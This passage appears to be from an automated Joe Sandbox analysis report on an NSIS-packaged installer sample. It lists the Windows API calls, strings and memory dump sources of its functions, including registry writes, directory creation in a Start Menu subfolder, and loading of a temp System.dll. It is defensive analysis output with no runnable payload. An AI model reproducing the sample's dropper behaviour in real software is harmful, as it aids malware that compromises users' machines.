GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

Call, xrefs: 004066CF, 00406782, 00406789, 0040678D, 004067AA, 004067BF, 004067D2, 004067E7, 00406814, 00406849, 0040684F, 0040686C, 0040687F, 0040689D, 004068A3, 004068AC, 004068E2
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1230650788
Opcode ID: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
Opcode Fuzzy Hash: a56a8a4d956183f5ceef7ff9e42496adb417aa599aaeb911d527621cdebcfcc9
Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsm3A84.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp$C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous$Call
API String ID: 1941528284-3221851754
Opcode ID: f15c8198a6df89e73f827ceadb4c73dab8f562a39fed638654e43d91f01e6988
Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
Opcode Fuzzy Hash: f15c8198a6df89e73f827ceadb4c73dab8f562a39fed638654e43d91f01e6988
Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B

Strings

\, xrefs: 004069ED
UXTHEME, xrefs: 004069CE
%s%S.dll, xrefs: 00406A11

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Function 00403479 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040348D

Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
SetFilePointer.KERNELBASE(00296A75,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB

Strings

{0A, xrefs: 00403549, 00403562
uj), xrefs: 0040347C, 00403599

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: uj)${0A
API String ID: 1092082344-4025203094
Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-823278215
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Function 6FC61817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6FC61BFF: GlobalFree.KERNEL32(?), ref: 6FC61E74
Part of subcall function 6FC61BFF: GlobalFree.KERNEL32(?), ref: 6FC61E79
Part of subcall function 6FC61BFF: GlobalFree.KERNEL32(?), ref: 6FC61E7E

GlobalFree.KERNEL32(00000000), ref: 6FC618C5
FreeLibrary.KERNEL32(?), ref: 6FC6194B
GlobalFree.KERNEL32(00000000), ref: 6FC61970

Part of subcall function 6FC6243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FC6246F

Part of subcall function 6FC62810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FC61896,00000000), ref: 6FC628E0

Part of subcall function 6FC61666: wsprintfW.USER32 ref: 6FC61694

Strings

, xrefs: 6FC61951

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: ce1600d59b9842dd90c3ddf316dc21f2051b19b7d528d84538c82d74d3dd41e5
Instruction ID: 514b5ec2d241660d5aea466980cbb7e6d1db541fc09a30cf84c90a9256db54b8
Opcode Fuzzy Hash: ce1600d59b9842dd90c3ddf316dc21f2051b19b7d528d84538c82d74d3dd41e5
Instruction Fuzzy Hash: 7B41A27180C3419BDF009F3DD8C8BD537A8BF0A76AF044466EA55AA0C6FB74E088C7A0

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsm3A84.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp
API String ID: 2655323295-4124611265
Opcode ID: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
Opcode Fuzzy Hash: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658

Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
RegCloseKey.KERNELBASE(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422728), ref: 00406587

Strings

('B, xrefs: 0040655B
Call, xrefs: 0040653D

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CloseQueryValue
String ID: ('B$Call
API String ID: 3356406503-2122505255
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4

Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004061A5
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0

Strings

nsa, xrefs: 00406194
C:\Users\user\AppData\Local\Temp\, xrefs: 0040618C

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-44229769
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Function 00403371 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396

Strings

uj), xrefs: 0040338B, 0040342B, 0040346B

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FilePointer
String ID: uj)
API String ID: 973152223-1893427432
Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous
API String ID: 1892508949-647064374
Opcode ID: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
Opcode Fuzzy Hash: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
